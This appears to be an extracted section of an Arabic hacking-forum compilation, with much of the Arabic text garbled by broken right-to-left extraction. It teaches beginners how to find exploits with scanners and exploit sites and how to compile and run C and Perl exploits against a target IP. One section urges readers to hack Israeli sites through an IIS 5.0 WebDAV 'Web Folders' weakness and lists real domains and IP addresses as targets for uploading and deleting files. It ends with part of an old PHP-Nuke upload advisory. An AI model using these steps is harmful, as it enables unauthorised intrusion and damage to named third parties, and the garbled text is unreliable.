‫ﺘﺎﻟﻲ ‪:‬‬‫اﻟﻤﻮ ﺿﻮ عاﻟﯿﻮم ﯾﻨﻘﺴﻢاﻟﻰاﻟ‬


‫ﺘﺎ ت ؟‬‫‪ -١‬ﻛﯿ ﻒﺗﺠﺪاﻛﺴﺒﻠﻮﯾ‬
‫ﺘﺜﻤﺎرا ت ( ؟‬‫ﺘﺎ ت ) دﻋﻮﻧﺎ ﻧﺴﻤﯿﻬﺎاﺳ‬ ‫ﺘﻌﻤ ﻞ ﺎﻻﻛﺴﺒﻠﻮﯾ‬ ‫‪-٢‬ﻛﯿ ﻒﺗﺴ‬
‫ﺘﺜﻤﺎرا ت‪...‬‬‫ﺘﻠﻔﻪ ﻣﻦاﻻﺳ‬ ‫‪ -٣‬ﺎﻧﻮا ع ﻣﺨ‬
‫ﻗﻊ ﻣﻔﯿﺪهﻟﻠﺒ ﺤﺚ ﻋ ﻞاﻟﺜﻐ ﺮا ت‪...‬‬ ‫‪ -٤‬ﻣﻮا‬
‫××××××××××××××××××××××××××××××××××××××××××××‬
‫‪a face at the interface :‬‬
‫ﺘﺨﺪم ﻋﺎدهﻟﻜﻲﺗ ﺤﺼ ﻞ ﻋ ﻞاﻟ ﺮوو ت ﻋ ﻞ ﻧﻈﺎم ﻣﻌﯿﻦ ‪..‬واﻟ ﺮوو ت ﻫﻮ ﻋﺒﺎره‬ ‫ﺘﺜﻤﺎرا تﺗﺴ‬ ‫ﺎﻻﺳ‬
‫ﺘﺜﻤﺎرا ت داﯾﻤﺎ ﻣﺎﺗﻮﺟﺪ‬ ‫ﻗﻪ‪ ...‬ﺎﻻﺳ‬‫ﺘ ﺮا‬
‫ﺘ ﺮاﺗﻮراو ﻣﺪﯾ ﺮاﻟﻨﻈﺎماﻟﺬيﺗ ﺮﯾﺪا ﺧ‬ ‫ﻋﻦاﻻدﻣﯿﻨﯿﺴ‬
‫ﺘﻄﯿﻊاﻟﺪ ﺧﻮ لﺑﻮاﺳﻄﻪا ل ‪http‬ﺑﺼﻮره ﻃﺒﯿﻌﺒﻪ ‪..‬‬ ‫ﺑﻮاﺳﻄﻪ ﻣﻠ ﻒ ﻣﻌﯿﻦ ﯾﺠﻌﻚﺗﺴ‬
‫ﺘﺜﻤﺎرا ت ﻣﺜ ﻞ‬ ‫ﺘﺜﻤﺎر ‪....‬ﯾﻮ ﺟﺪ ﺎﻟﻌﺪﯾﺪ ﻣﻦاﻻﺳ‬‫ﺘﺨﺪم ‪scanner‬ﻟﺒ ﺤﺚ ﻋﻦﻫﺬااﻻﺳ‬ ‫ﻟﺬﻟﻚ ﻧﺴ‬
‫‪BOF (buffer over flow) , DoS ( denial of service) ,‬‬
‫ﻮ ﻋﻠﻰﻓﻜ ﺮهاﻧﺎااؤﻣﻦانا ل ﻫﺠﻮما ل ‪DoS‬ﻫﻲاﻛﺴﺒﻠﻮﯾ ﺖ ‪...‬‬
‫ﺘﺎﯾﻪ ﻋﻠﻰاﻟﻤﻠﻔﺎ ت‬ ‫ﺘﯿﺢﻟﻚﺗﻨﻔﯿﺬﺑﻌ ﺾاﻻواﻣ ﺮ ﻣﺜ ﻞ ﻋ ﺮ ض و ﻣﺴﺢ واﻟﻜ‬ ‫ﺘﻲﺗ‬ ‫ﻮ ﯾﻮﺟﺪاﯾ ﻀﺎ ﺎﻟﺜﻐ ﺮا تاﻟ‬
‫ﺘﯿﻨﺸﻨﺰ و ﻏﯿ ﺮﻫﺎ ‪....‬ﺑﺎﻟﻨﺴﺒﻪﻟﻤﻮ ﺿﻮ عاﻟﺒﻮﻓ ﺮاوﻓ ﺮﻓﻠﻮﻓﻬﻮ ﯾﺸﺒﻪاﻟﻰ ﺣﺪﻛﺒﯿ ﺮ‬ ‫ﻣﺚاﻻﻛﺴ‬
‫ﺘﻤﺪ ﻋﻠﻰارﺑﺎكاﻟﺴﯿ ﺮﻓﯿ ﺮﺑﻔﯿ ﺾ ﻣﻦاﻟﻤﻌﻠﻮﻣﺎ ت و ﯾﻤﻨ ﺤﻚاﻟ ﺮوو ت‪.‬‬ ‫ﺎ ل ‪ DoS‬ﺣﯿﺚ ﯾﻌ‬
‫ﺎﻣﺎ ﻫﺠﻮما ل ‪DoS‬ﻓﻬﻮ ﻋﺒﺎره ﻋﻦارﺳﺎ ل ‪ GET / POST‬ﺎ لاﻟﺴﯿ ﺮﻓﯿ ﺮ ﻣﻤﺎ ﯾﺆدي ﺎ ل‬
‫ﺣﺪو ث ‪OVERLOAD‬ﻟﻮ ﺣﺪهاﻟﻤﻌﺎﻟﺠﻪاﻟﻤ ﺮﻛﺰﯾﻪﻟﻠﺴﯿ ﺮﻓﯿ ﺮ )اﻟﻠﻲ ﻫﻮ ﻋﺒﺎره ﻋﻦ ﺟﻬﺎز ﯾﻌﻤ ﻞ‬
‫ﻗﻊ ﻋﻦاﻟﻌﻤ ﻞ و ﯾﺼﺒﺢاﻟﺴﯿ ﺮﻓﯿ ﺮ‪OFFLINE ....‬‬ ‫ﻗ ﻒاﻟﻤﻮ‬ ‫ﺘﻮ‬ ‫‪ 24‬ﺳﺎﻋﻪ (ﻓﯿ‬
‫××××××××××××××××××××××××××××××××××××××××××××××××××‬

‫ﺘﺜﻤﺎرا ت ؟‬‫‪ -١‬ﻛﯿ ﻒﺗﺠﺪاﺳ‬


‫ﺘﺎﻛﺪاناﻟﺜﻐ ﺮه ﻣﻮﺟﻮدهﻓﻲ‬ ‫ﺘﺜﻤ ﺮﺛﻐ ﺮه ﻣﻌﯿﻨﻪﻓﻲ ﺳﯿ ﺮﻓﯿ ﺮﻓﺎﻧﻪ ﯾﺠﺐ ﻋﻠﯿﻚ ﺎوﻻانﺗ‬ ‫ﺘﻄﯿﻊانﺗﺴ‬ ‫ﻟﻜﻲﺗﺴ‬
‫اﻟﺴﯿ ﺮﻓﯿ ﺮ‬
‫ﺘﯿﻦﻟﻤﻌ ﺮﻓﻪ ﻣﺎاذاﻛﺎﻧ ﺖاﻟﺜﻐ ﺮه ﻣﻮﺟﻮدهام ﻻ‪..‬‬‫ﺘﺜﻤﺎر ﻋﺒﺎره ﻋﻦﻓﺎﯾ ﻞ ﻣﻌﯿﻦ ‪..‬ﻓﺎﻧﻪ ﯾﻮﺟﺪ ﻃ ﺮﯾﻘ‬ ‫ﻮﻟﻤﺎﻛﺎناﻻﺳ‬
‫ﺘﺼﻔﺢ ﻣﺜ ﻞاﻟﯿﻮﻧﯿﻜﻮداو‬ ‫ﺘﺼﻔﺢﻛﻤﺎﻓﻲ ﺣﺎﻟﻪﺑﻌ ﺾﺛﻐ ﺮا تاﻣ‬ ‫ﺘﻄﺒﯿ ﻖ ﻣﺒﺎﺷ ﺮه ﻣﻦ ﺧﻼ لاﻟﻤ‬ ‫ﺎﻣﺎ ﻋﻦ ﻃ ﺮﯾ ﻖ ﺎﻟ‬
‫ﺎﻟﻔ ﺮوﻧ ﺖﺑﯿ ﺞ‬
‫ﺘﺼﻔﺢﻟﻬﺎ ﺳﻜﺎﻧ ﺮزا ل‬ ‫ﻗﻊ ‪ ..‬ﻃﺒﻌﺎ ﻣﻦاﻟﻤﻌ ﺮو فانﺛﻐ ﺮا ت ﺎﻟﻤ‬‫ﺘﺨﺪماﻟﺴﻜﺎﻧ ﺮزﻓﻲﻓ ﺤ ﺺاﻟﻤﻮ‬ ‫ﺎوانﺗﺴ‬
‫‪threads‬‬
‫ﻮﻫﻲﺗﺴﻤﻰا ل ‪cgi scaners‬ﺑﻌ ﻀﻬﺎ ﻣﻤﻜﻦانﺗ ﻀﯿ ﻒﻟﻪ ﻣﻠﻔﺎ تﺑﻬﺎﺛﻐ ﺮا ت واﻟﺒﻌ ﺾاﻻ ﺧ ﺮ ﯾﻜﻮن ﺟﺎﻫﺰا‬
‫‪..‬‬
‫ﻮ ﻫﻨﺎك ﻧﻮ عا ﺧ ﺮ ﻣﻦاﻟﺴﻜﺎﻧ ﺮز وان ﺎ ﺣﺒﺬه>>> ‪...shadow security scaner‬‬
‫ﺘﻲ ﯾﻤﻜﻦانﺗﺠﺪﺑﻬﺎا ﺣﺪ ثاﻟﺜﻐ ﺮا ت ﻫﻮ ‪ rootshell.com‬ﻮ ﻫﻮ‬ ‫ﻗﻊ ﺎﻟ‬‫‪.....‬ﻋﻠﻰﻓﻜ ﺮه ﻣﻦا ﺣﺴﻦاﻟﻤﻮا‬
‫ﺘﻮي ﻋﻠﻰ‬ ‫ﯾﺤ‬
‫ﺘﺎن ﻣﺜ ﻞ ‪ red hat 7.2‬ﻮ ﺳﻮ ف‬ ‫ﺘﺎ حﻟﻠﺒ ﺤﺚ ﻋﺒﺎره ﻋﻦﻛﻠﻤﻪ وا ﺣﺪهاوﻛﻠﻤ‬ ‫ﻣ ﺤ ﺮكﺑ ﺤﺚ ﯾﻜﻔﻲانﺗ ﻀﻊ ﻣﻔ‬
‫ﺘﻮي ﻋﻠﻰ‬ ‫ﺘﻲﺗ ﺤ‬ ‫ﺗﺠﺪ ﺎﻟﻌﺪﯾﺪ ﻣﻦاﻟﺜﻐ ﺮا تاﻟ‬

‫‪٢ ٠٦‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫‪red hat 7.2 ......‬‬

‫××××××××××××××××××××××××××××××××××××××××××××××‬

‫ﺘﻐ ﻞﻫﺬهاﻟﺜﻐ ﺮا ت ؟؟‬‫‪-٢‬ﻛﯿ ﻒﺗﺴ‬


‫ﺘﺜﻤﺎرا ت ﻣﻌﯿﻨﻪ‬‫ﻗﻊﺑﺴﻜﺎﻧ ﺮ )و ﺧﺎ ﺻﻪا ل ) ‪ shadow‬ﻮ ﯾﻄﻠﻊﻟﻬﻢاﺳ‬ ‫ﺎﻟﻜﺜﯿ ﺮ ﻣﻦاﻟﻨﺎس ﻋﻨﺪﻣﺎ ﯾﻔ ﺤﺼﻮن ﻣﻮ‬
‫‪..‬ﻻ ﯾﻌ ﺮﻓﻮناﯾ ﺶ ﯾﺴﻮون‬
‫ﺑﻌﺪﻛﺬا؟؟؟؟‪...‬‬
‫ﻗﯿﻬﺎ ﻫﻨﺎك ‪..‬‬
‫ﻗﻲ ‪url‬ﺑﺠﺎﻧﺐاﻟﺜﻐ ﺮه ‪..‬ﺗﺰرواﻟﻌﻨﻮان ده وﺗﻘ ﺮهﻛ ﻞﻛﻠﻤﻪﺗﻼ‬ ‫ﺘﻼ‬ ‫ﺘﻌﻤ ﻞاﻟﺸﺎدو ﺣ‬ ‫ﺘﺴ‬ ‫ﻟﻮاﻧ ﺖﺑ‬
‫ﻗﻊ ‪rootshell.com‬‬ ‫ﺛﻐ ﺮه وﺗ ﺮو حاﻟﻤﻮ‬‫ﺎواذاﻟﻢﺗﺠﺪاي ‪url‬ﻓﻲاﻟﺴﻜﺎﻧ ﺮزاﻻ ﺧ ﺮى ﯾﺒﻘﻰﺗﺎ ﺧﺪاﺳﻢا‬
‫ﺘﺜﻤﺎرﻟﻬﺎي‬‫ﻗﻲاﺳ‬‫ﺘﻼ‬‫ﺘﺐﻓﻲ ﻣ ﺤ ﺮكاﻟﺒ ﺤﺚاﺳﻢاﻟﺜﻐ ﺮه و ﺎﻧ ﺖان ﺷﺎ ءا ﷲﻓﻲ ‪ %٩٩‬ﻣﻦاﻟ ﺤﺎﻻ تﺑ‬ ‫ﻮﺗﻜ‬
‫اﻟﺜﻐ ﺮه‪..‬‬
‫ﺘﺨﺪﻣﻬﺎ ﻮاﺷﯿﺎ ء زيﻛﺪه ‪.......‬‬ ‫ﻮﻛﯿ ﻒﺗﺴ‬

‫×××××××××××××××××××××××××××××××××××××××××××××‬
‫ﺘﺜﻤﺎرا ت ‪:‬‬‫ﺘﻠﻔﻪ ﻣﻦاﻻﺳ‬ ‫‪ -٣‬ﺎﻧﻮا ع ﻣﺨ‬
‫ﺘﺜﻤﺎرا ت ﯾﻜﻮنﻫﺪﻓﻬﺎ ﻫﻮ ﻣﻨ ﺤﻚ ﺎﻟ ﺮوو ت ﻋﻠﻰاﻟﺴﯿ ﺮﻓﯿ ﺮ ‪..‬ﻣﻌﻨﻰﻛﻠﻤﻪ روو تﻫﻮاﻟﻤﺪﯾ ﺮ‬ ‫ﻃﺒﻌﺎاﻟﻜﺜﯿ ﺮ ﻣﻦاﻻﺳ‬
‫ﺘﺒﻬﺎ ‪..‬ايﻟﻚﻛ ﻞاﻟﺼﻼ ﺣﯿﺎ ت ﻋﻠﻰ‬ ‫ﺎواﻻدﻣﯿﻦ ‪..‬ﻻ ﯾﻮﺟﺪايﻗﯿﻮد ﻋﻠﻰا ل ‪ commands‬ﺎﻟﻠﻲاﻟ ﺮوو ت ﯾﻜ‬
‫اﻟﺴﯿ ﺮﻓﯿ ﺮ‬
‫ﺘﻢ ﻣﻦ ﺧﻼ لاﻟﻌﺪﯾﺪ ﻣﻦاﻟﺜﻐ ﺮا ت ﻣﺜ ﻞﺛﻐ ﺮا تا ل ‪ http ,‬ﻮا ل ‪ BOF‬ﻮ‬ ‫ﻮاﻟ ﺤﺼﻮ ل ﻋﻠﻰاﻟ ﺮوو ت ﯾﻤﻜﻦان ﯾ‬
‫ﻏﯿ ﺮﻫﺎ ‪..‬‬
‫ﺘﺎﺑﻪ ﻋ ﻞاﻟﻤﻠﻔﺎ ت و‬ ‫ﺘﻤﺪ ﻋﻠﻰ ﻃ ﺮﯾﻘﻪ ﻋﻤ ﻞاﻟﺜﻐ ﺮا ت ‪..‬ﻓﻬﻲﻗﺪﺗﻌﻄﻲﻟﻚ ﺻﻼ ﺣﯿﻪﻗ ﺮا ءه و ﺣﺬ ف ﻮاﻟﻜ‬ ‫ﻛﻬﺎﺗﻌ‬
‫اﯾ ﻀﺎ‬
‫ﺮﻓﻊ ﻣﻠﻔﺎ تاﻟﻰاﻟ ﺴﯿ ﺮﻓﯿ ﺮ ‪....‬‬
‫ﺎوﻗﺪﺗﻌﻄﻲﻟﻚ ﺎﻟﻜﻠﻤﻪاﻟﺴ ﺮﯾﻪ واﺳﻢاﻟﯿﻮزراﻣﺎﻓﻲ ﺻﻮره وا ﺿ ﺤﻪ ﻣﺜ ﻞاﻟﻤﻠ ﻒ ‪ config.inc‬ﺎو ﻣﺸﻔ ﺮه‬
‫ﺑﻤﻘﯿﺎس‬
‫‪DES/MD5 ...‬ﻛﻤﺎﻓﻲاﻟﻤﻠ ﻒ ‪/etc/passwd ....‬ﻓﻲاﻧﻈﻤﻪاﻟﯿﻮﻧﯿﻜ ﺲ‪...‬‬
‫ﺑﺎﻟﻨﺴﺒﻪﻟﻠﺒﻔ ﺮاوﻓ ﺮﻓﻠﻮﻓﻬﻮ ﯾﺸﺒﻪاﻟﻰ ﺣﺪﻛﺒﯿ ﺮ ﻫﺠﻮما ل ‪ DoS‬ﻮﻟﻜﻨﻪ ﻻ ﯾﺴﺒﺐ ﺿ ﺮرﻟﻠﺴﯿ ﺮﻓﯿ ﺮ ﻣﺜﻠﻤﺎ ﯾﺴﺒﺒﻪ‬
‫ﺘﻬﻲ داﺋﻤﺎ‬ ‫ﻫﺠﻮما ل ‪DoS‬ﺎﻟﻤﻬﻢاﻧﻪﻓﻲاﻏﻠﺐاﻻ ﺣﯿﺎن ﯾﻜﻮناﻟﺒﻔ ﺮ ﻋﺒﺎره ﻋﻦارﺳﺎ لاواﻣ ﺮﻟﻠﺴﯿ ﺮﻓﯿ ﺮﺗﻨ‬
‫ﺑﺎﻋﻄﺎﺋﻚ‬
‫ﺘﻘﺒﺎ لاﻟﺴﯿ ﺮﻓﯿ ﺮﻟﻜﻢ ﻫﺎﺋ ﻞ ﻣﻦاﻟﺪاﺗﺎﻓﯿﺆدياﻟﻰارﺑﺎكاﻟﺴﯿ ﺮﻓﯿ ﺮ‪..‬‬‫ﺻﻼ ﺣﯿﻪاﻟ ﺮوو ت ‪ ...‬و ﻫﺬاﺑﺴﺒﺐاﺳ‬

‫××××××××××××××××××××××××××××××××××××××××××××××××××‬
‫×××××××××××××××××××××××××××××××××‬
‫ﻗﻊ ﻣﻔﯿﺪهﻟﻠﺒ ﺤﺚ ﻋﻦاﻟﺜﻐ ﺮا ت ﻣﻦ ﺧﻼﻟﻬﺎ ‪:‬‬
‫‪ -٤‬ﻣﻮا‬
‫ﻗﻊ ‪:‬‬‫ﺘﺜﻤﺎرا تاﻟﺠﺪﯾﺪهﻓﻲ ﻫﺬهاﻟﻤﻮا‬‫ﯾﻤﻜﻨﻚاﻟﺒ ﺤﺚ ﻋﻦاﻻﺳ‬
‫‪packetstorm.securify.com /.securityfocus.com /www.insecure.org‬‬
‫‪ http://rootshell.redi.tk/‬ﻮ ﻏﯿ ﺮﻫﺎاﺑ ﺤﺚ ﺳﻮ فﺗﺠﺪاﻟﻤﺰﯾﺪ ‪....(:‬‬

‫‪٢ ٠٧‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" ﻛﯿﻒ ﺗﺴﺘﺨﺪم اﻟﺜﻐﺮات "‬

‫‪$$$$$$$$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪VoOoDa BE$T :‬‬
‫‪$$$$$$$$$$$$$$$$$‬‬

‫ﺎﻟﺒﺪاﯾﺔ‪:‬‬

‫‪txt. :‬‬
‫ﺘﻮﺑﺔ‬
‫ﺘﻮي ﻋﻠﻰ ﺳﻮرسﻛﻮدﻟﺒﻌ ﺾاﻟﺜﻐ ﺮا تاو اﻟﺒ ﺮاﻣ ﺞاﻟﻤﻜ‬ ‫وﯾﻌﻨﻲ ﻣﻠ ﻒ ﻣﻠ ﻒ ﻧﺼﻲ‪..‬ﻣﻦاﻟﻤﻤﻜﻦاي ﯾ ﺤ‬
‫ﺘﺨﺪاﻣﻬﺎ‪..‬‬ ‫ﺘﻌ ﺮ فﻛﯿﻔﯿﺔاﺳ‬ ‫ﺑﺎﻟﺴﻲ ‪ ،‬اﻟﺒﯿ ﺮ‪..‬اﻛﻤ ﻞاﻟﻘ ﺮا ءةﻟ‬
‫><><><><><><><><‬
‫‪c. :‬‬
‫ﺘ ﺮ ض ﻋﻠﯿﻚ‬ ‫ﺘﻬﺎﺑﺎﻟﺴﻲ‪..‬ﻫﺬا ﯾﻔ‬‫ﺘﺎﺑ‬
‫ﺘﻢﻛ‬
‫ﻫﻮﺑ ﺮﻧﺎﻣ ﺞ ﺳﻲﻟﻜﻨﻪ ﺳﻮرسﻛﻮدﻓﻘﻂ‪..‬واﻏﻠﺐاﻟﺜﻐ ﺮا ت ﯾ‬
‫ﻋﻠﯿﻚﺗ ﺤﻤﯿﻠﻪﺛﻢ ﻋﻤ ﻞ )‪_ (compile‬وﻫﺬا ﯾﻌﻨﻲﺗ ﺤﻮﯾ ﻞاﻟﺴﻮرسﻛﻮدﻟﻤﻠ ﻒ )ﺑ ﺮﻧﺎﻣ ﺞ(_ﺛﻢﺗﺜﻮم‬
‫ﺘﺸﻐﯿﻠﻪ‪...‬ﻟﻜﻦاﻟﻤﺸﻜﻠﺔﻫﻨﺎاﻧﻪﻟﻦ ﯾﻤﻜﻦﺗﺸﻐﯿﻠﻬﺎﺗ ﺤ ﺖﺑﯿﺌﺔ وﯾﻨﺪوز‪..‬ﻓﯿﺠﺐان ﯾﻜﻮن ﻋﻨﺪك ‪Linux‬او‬ ‫ﺑ‬
‫‪.. Shell Account‬‬
‫ﺘﺐ‪:‬‬ ‫ﺘ ﺤﻤﯿ ﻞﺗﻮﺟﻪﻟﻠﻤﺴﺎراﻟﻤﻮﺟﻮدﺑﻪاﻟﻤﻔ ﻞﺛﻢاﻛ‬ ‫ﺑﻌ ﺾاﻟ‬
‫‪>---- gcc filenmae.c‬اﻣ ﺮاﻟﻜﻮﻣﺒﺎﯾ ﻞ‬
‫ﺘ ﺞاﻟﻤﻠ ﻒ‪:‬‬ ‫ﺳﯿﻨ‬
‫‪ >--- a.out‬وﻫﻮاﻟﺒ ﺮﻧﺎﻣ ﺞاﻟﻨﺎﺗ ﺞ‪..‬‬

‫واﻻن ﻣﺎذا ﯾﻨﻘﺼﻚ؟؟‬


‫ﻗﻊاﻟﺬيﺗ ﺮﯾﺪانﺗﻄﺒ ﻖ ﻋﻠﯿﻪاﻟﺜﻐ ﺮة‪..‬‬
‫ﯾﺠﺐان ﯾﻜﻮن ﻣﻌﻚايﺑﻲاواﺳﻢاﻟﻤﻮ‬

‫ﻛﻤﺜﺎ ل‪:‬‬
‫‪a.out xxx.xxx.xxx.xxx/.‬‬
‫ﺘﻮﺑﺔﺑﺎﻟﺒﯿ ﺮ ل‪:‬‬ ‫ﻟﻠﺜﻐ ﺮا تاﻟﻤﻜ‬
‫><><><><><><><><‬
‫‪pl. :‬‬
‫ﺘﺎج ‪Linux‬او ‪Shell Account‬‬ ‫ﺘﺸﻐﯿﻠﻪاﯾ ﻀﺎﺗ ﺤ‬ ‫ﺑ ﺮﻧﺎﻣ ﺞﺑﯿ ﺮ ل‪..‬ﻟ‬
‫ﺘﺐ‪:‬‬
‫ﻗﻊاﻛ‬ ‫اذاﻛﺎن ‪ exploit‬وارد تانﺗﻄﺒﻘﻪ ﻋﻠﻰ ﻣﻮ‬
‫‪perl filename.pl xxx.xxx.xxx.xxx‬‬
‫او‬
‫‪filename xxx.xxx.xxx.xxx/.‬‬

‫><><><><><><><><‬
‫‪...‬‬

‫‪٢ ٠٨‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" ﲤﺘﻊ ﺑﺈﺧﱰاق اﳌﻮاﻗﻊ اﻹﺳﺮاﺋﯿﻠﯿﺔ ﻣﻊ ﻫﺬه اﻟﺜﻐﺮة "‬

‫‪$$$$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪DeadLine:‬‬
‫‪$$$$$$$$$$$$$‬‬

‫اﻟﺸ ﺮ ح ‪:‬‬
‫ًاﻟﺜﻐ ﺮه ﯾﺎأ ﺧﻮانﺗﻄﺒ ﻖ ﻋﻠﻰ ﺳﯿ ﺮﻓ ﺮا ت ‪:‬‬
‫ﺎوﻻ‬
‫‪Microsoft-IIS/5.0 on Windows 2000‬‬

‫ﺘﻠﻚ‬
‫ﺘﺎﺟﻪ ﻫﻲاداهﺑﺴﯿﻄﻪ ﯾﻘﺪﻣﻬﺎﻟﻨﺎ وﻧﺪوز ‪ ٩٨‬ﻮاﻧﻨﻲ ﻻاﻋﻠﻢانﻛﺎﻧ ﺖاﻟﻨﺴ ﺦاﻻ ﺧ ﺮىﺗﻤ‬
‫ﯾﺎأ ﺧﻮانﻛ ﻞ ﻣﺎﻧ ﺤ‬
‫ﻣﺜ ﻞ ﻫﺬهﻟﺨﺎ ﺻﯿﻪام ﻻ ﻻﻧﻨﻲاﻋﻤ ﻞ ﻋﻠﻰ ﻧﻈﺎﻣﯿﻦﻓﻘﻂﻟﯿﻨﻜ ﺲ ﻣﺎﻧﺪرﯾﻚ ووﻧﺪوز‪٩٨‬ﻓﻘﻂ ‪:‬‬

‫ﺎﻻداه ﻫﻲ‪: Web Folders‬‬

‫ﺎﯾﻦ ﻧﺠﺪ ﻫﺬهاﻟﺜﻐ ﺮه ‪:‬‬


‫ﺘﺎﻟﯿﻪ ‪:‬‬
‫ً ﺳﻮ ف ﻧﺠﺪﻫﺎاﻧﺸﺎ ء ﷲﻓﻲاﻟﺨﻄﻮا ت ﺎﻟ‬ ‫ﺣﺴﻨﺎ‬
‫ﺎد ﺧ ﻞ ﻋﻠﻰ ‪My Computer‬‬

‫ﺘﺠﺪﻫﺎﻫﻨﺎكﻟﯿ ﺲ دا ﺧ ﻞاﻟﺴﻲاو ﺷﻲ ء آ ﺧ ﺮﺑ ﻞ دا ﺧ ﻞ ‪My Computer‬ﻓﻘﻂ ﯾﻌﻨﻲﺗﻜﻮنﻫﻲ ﻣﻊاﻟﺴﻲ‬ ‫ﺛﻢ ﺳ‬


‫واﻟﺪياﻟﻰ آ ﺧ ﺮه‬

‫ﺘﺢ ﯾﺎأ ﺧﻮناﻟﻤﻠ ﻒاﻟﻤﺴﻤﻰ ‪Web Folders‬‬


‫ﻧﻔ‬

‫ﺛﻢ ﺳﻨﺠﺪاﻵﺗﻲ ‪:‬‬

‫ﺘ ﺮا ق‬
‫ﺘﻜﻮناداﺗﻨﺎاﻟﻤﻬﻤﻪﻟﻼ ﺧ‬
‫ﺘﻲ ﺳ‬
‫‪ Add Web Folder‬ﺣﯿﺚﻫﻲاﻟ‬

‫ﺘﺢا ل ‪Add Web Folder :‬‬


‫ﻧﻔ‬

‫ﺣﯿﺚ ﻧﺠﺪﻛﻠﻤﺔ ‪Type the location to add‬‬

‫ﺘﻄﯿ ﻞ ﻧﻘﻮمﺑﺄد ﺧﺎ لاﻵﺗﻲ ‪:‬‬


‫ﺘﻬﺎ ﻣﺴ‬
‫ﻮﻧ ﺮىﺗ ﺤ‬

‫‪http://hostname.com/‬‬
‫ﻗﻊ وﻟﯿ ﺲاﻻﺳﻢ‬
‫ﺘﺒﻪﻗﻠﻨﺎاﯾﺒﻲاﻟﻤﻮ‬
‫ﻗﻊاﻧ‬‫ﺣﯿﺚان ‪hostname‬ﻫﻮاﯾﺒﻲاﻟﻤﻮ‬
‫ﻗﻊ وﻫﻨﺎك ﺪروسﻛﺜﯿ ﺮهﺑﺨﺼﻮ ص ﻫﺬااﻟﻤﻮ ﺿﻮ ع‬ ‫ﻮاﻟﺠﻤﯿﻊ ﯾﻌ ﺮ فﻛﯿ ﻒ ﯾﺨ ﺮجاﻻﯾﺒﻲﺗﺒﻊاﻟﻤﻮ‬

‫ﺘﻄﯿﺒ ﻖ ﺣﯿﺚاﻧﻬﺎﺗﻌﻤ ﻞ ﻋﻠﻰاﯾﺒﻲ ﻣﻮ ﺣﺪ ‪:‬‬


‫ﻗﻊاﺳ ﺮاﺋﯿﻠﯿﻪﻟﻠ‬
‫ﻮﻫﺬه ﻣﻮا‬
‫‪mail.talcar.co.il‬‬
‫‪daihatsu-israel.co.il‬‬
‫‪daewoo-israel.co.il‬‬

‫‪٢ ٠٩‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﻄﯿ ﻞاﻟﺬيﺗﻢ ذﻛ ﺮه ‪:‬‬


‫ﻧﺪ ﺧ ﻞﺑﺎﻟﻤﺴ‬
‫‪http://192.117.143.121/‬‬

‫ﺛﻢ ﻧ ﻀﻐﻂ ﻋﻠﻰﻛﻠﻤﺔ ‪: Next‬‬

‫ﻗﻊ وﺗﻌﻄﯿﻚ ﺧﺎﺻﯿﺔاﻻدﻣﻦ وﻫﻲﺗ ﺤﻤﯿ ﻞ ﻮازاﻟﺔاﻟﻤﻠﻔﺎ ت‬


‫ﺘ ﺤﻤﯿ ﻞ ﻣﻠﻔﺎ تاﻟﻤﻮ‬
‫وﻫﻨﺎ ﺳﻮ فﺗﻌﻤ ﻞاﻻداهﺑ‬

‫ﺘ ﺤﻤﯿ ﻞﺗﻈﻬ ﺮﻟﻚﻛﻠﻤﺔ ‪: finish‬‬


‫ﺘﻬﻲاﻟﺒ ﺮﻧﺎﻣ ﺞ ﻣﻦاﻟ‬
‫ﻓﺒﻌﺪان ﯾﻨ‬

‫ﻗﻊ‬
‫ﻗﻊ ﻫﻨﺎك وﻣﺴﻤﻰﺗ ﺤ ﺖاﯾﺒﻲ ﺎﻟﻤﻮ‬
‫ﻋﻨﺪﻫﺎﺗﺬﻫﺐاﻟﻰا ل ‪ : Web Folder‬ﻮﺗﺠﺪ ﻣﻠ ﻒاﻟﻤﻮ‬

‫ﺘﻄﺒﯿ ﻖ ‪:‬‬
‫ﻗﻊا ﺧ ﺮﻟﻠ‬
‫ﻣﻮ‬

‫‪212.199.43.84http://www.israwine.co.il/‬‬

‫ﻣﻼ ﺣﻈﻪ ‪:‬اذاﺗﻢ ﻃﻠﺐاد ﺧﺎ لﺑﺎﺳﻮورد وﯾﻮزر ﻧﯿﻢﻓﺄﻋ ﺮ فاناﻟﺜﻐ ﺮه ﻣﻐﻠﻘﻪ‬


‫ﺎواذا د ﺧﻠ ﺖاﻟﻰ ﺎﻟﻤﻠﻔﺎ ت وﻟﻢﺗﺠﺪاي ﻣﻠ ﻒﻓﻤﻌﻨﺎهاناﻟﺜﻐ ﺮه ﻣﻐﻠﻘﻪاﯾ ﻀﺎ‬
‫ً‬
‫ﺘﻮﻓﯿ ﻖ ﻮاﻟﻌﺎﻓﯿﻪاﻟﻠﻬﻢاﻣﯿﻦاﻟﻠﻬﻢاﻣﯿﻦ‪...‬‬
‫ﺎﺳﺌ ﻞا ﷲاﻟ‬

‫‪٢١ ٠‬‬
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

" ‫"ﺛﻐﺮة ﻧﯿﻮك‬

$$$$$$$$$$$$$$$
Arab VieruZ :‫اﻟﻜﺎﺗﺐ‬
$$$$$$$$$$$$$$$

: ‫ﺎﻟﺸ ﺮ حﺑﺎﻷﻧﻘﻠﯿﺰﯾﺔ‬

day from LucisFero and supergate٠here your :twlc


CDT ١٤:٢٥:٥٨ @ ٢٤Posted on Monday, September
advisories :topic
twlc security divison
٢٠٠١/٠٩/٢٤

.Php nuke BUGGED

:Found by
LucisFero and supergate
twlc/.

Summary
it allows you to 'cp' any file on ...This time the bug is really dangerous
...or even upload files ...the box

dSystems Affecte
all the versions ARE vulnerable
is ٥٫٢is ok while the final .i wonder why a released c) '١RC ٥٫٠except '
(bugged

Explanation
Do you need sql password?

١=php?upload.admin/net.server.www//:http
